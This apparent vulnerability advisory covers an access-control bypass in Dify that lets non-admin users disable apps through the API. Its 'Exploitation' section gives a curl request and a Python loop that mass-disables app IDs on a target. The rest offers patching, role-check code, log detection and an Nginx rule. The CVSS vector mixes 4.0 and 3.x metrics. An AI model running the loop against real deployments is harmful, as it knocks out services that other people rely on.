How the CVE Works
CVE-2025-32796 is an access control flaw in Dify (versions before 0.6.12) where normal users can bypass UI restrictions and manipulate app states (enable/disable) via API calls. The web UI hides these functions for non-admin users, but the API lacks proper role validation. Attackers exploit this by sending direct HTTP requests (e.g., POST /api/apps/{id}/disable) without admin privileges, disrupting app availability. The vulnerability stems from missing server-side authorization checks, allowing unauthorized state changes.
DailyCVE Form
Platform: Dify
Version: <0.6.12
Vulnerability: Access Bypass
Severity: Medium
Date: 04/18/2025
What Undercode Say:
Exploitation
1. Craft API Request:
curl -X POST http://<dify-host>/api/apps/123/disable -H "Authorization: Bearer <user-token>"
2. Brute Force Endpoints:
import requests

for app_id in range(1, 100):
    requests.post(f"http://target/api/apps/{app_id}/disable",
                  headers={"Authorization": "Bearer <token>"})
Protection
1. Patch Upgrade:
pip install --upgrade dify==0.6.12
2. RBAC Enforcement:
# Example middleware (Flask-like)
def check_admin(req):
    if not req.user.is_admin:
        return {"error": "Forbidden"}, 403
3. Network Controls:
Restrict the /api/apps/ state-change endpoints at the WAF or reverse proxy (see the Nginx rule under Mitigation). A layer-4 packet filter cannot express this: nftables has no HTTP method/path string match, so a rule of the form nft add rule ip filter INPUT tcp dport 80 str "POST /api/apps/" drop is not valid nftables syntax and must not be relied on.
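The RBAC point above in working form, as an added example that is not Dify's code: the vulnerable route shape (the server trusts that the UI hid the button) next to the hardened one, where the role is enforced on the server by a decorator. User, App, APPS and handle are hypothetical names standing in for the framework's request and data layers.

```python
# Added example: server-side role enforcement for app enable/disable.
# User, App, APPS, handle are hypothetical, not Dify's own code.
from dataclasses import dataclass
from functools import wraps


@dataclass
class User:
    id: str
    role: str  # "admin" or "normal"


@dataclass
class App:
    id: int
    enabled: bool = True


APPS = {123: App(123), 124: App(124)}  # constructed sample state


class Forbidden(Exception):
    """Raised when the caller lacks the required role."""


def require_role(*roles):
    """Check the caller's role on the server, regardless of what the UI shows."""
    def deco(fn):
        @wraps(fn)
        def wrapper(user, *args, **kwargs):
            if user.role not in roles:
                raise Forbidden(f"{user.id} ({user.role}) may not call {fn.__name__}")
            return fn(user, *args, **kwargs)
        return wrapper
    return deco


# Vulnerable shape: no server-side check, so any authenticated user succeeds.
def disable_app_unchecked(user, app_id):
    APPS[app_id].enabled = False
    return {"id": app_id, "enabled": False}


# Hardened shape: same route, role enforced before the state change.
@require_role("admin")
def disable_app(user, app_id):
    APPS[app_id].enabled = False
    return {"id": app_id, "enabled": False}


def handle(route, user, app_id):
    """Minimal stand-in for the HTTP layer; returns (status, body)."""
    try:
        return 200, route(user, app_id)
    except Forbidden as e:
        return 403, {"error": "Forbidden", "detail": str(e)}
    except KeyError:
        return 404, {"error": "Not found"}
```

Running handle(disable_app_unchecked, User("alice", "normal"), 123) returns 200 and flips the state, while handle(disable_app, ...) for the same user returns 403 and leaves it untouched.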
Analytics
- CVSS: 6.5 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/S:U/C:N/I:L/A:L)
- Exploitability: Low complexity, no user interaction.
- Impact: Integrity/Availability compromise.
Detection
Log monitoring for unauthorized POSTs (assumes the access log records the authenticated user; filter on whatever user or role field your log actually carries):
grep 'POST /api/apps/' /var/log/dify/access.log | grep -v 'admin-user'
Mitigation
Nginx rule to block non-admin API calls (a stopgap until patched; matching a token string in the Authorization header is not real authorization, and the original pattern ./ matched only a single-character app id):
location ~ ^/api/apps/[^/]+/(enable|disable)$ {
    if ($http_authorization !~ "admin-token") {
        return 403;
    }
}
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode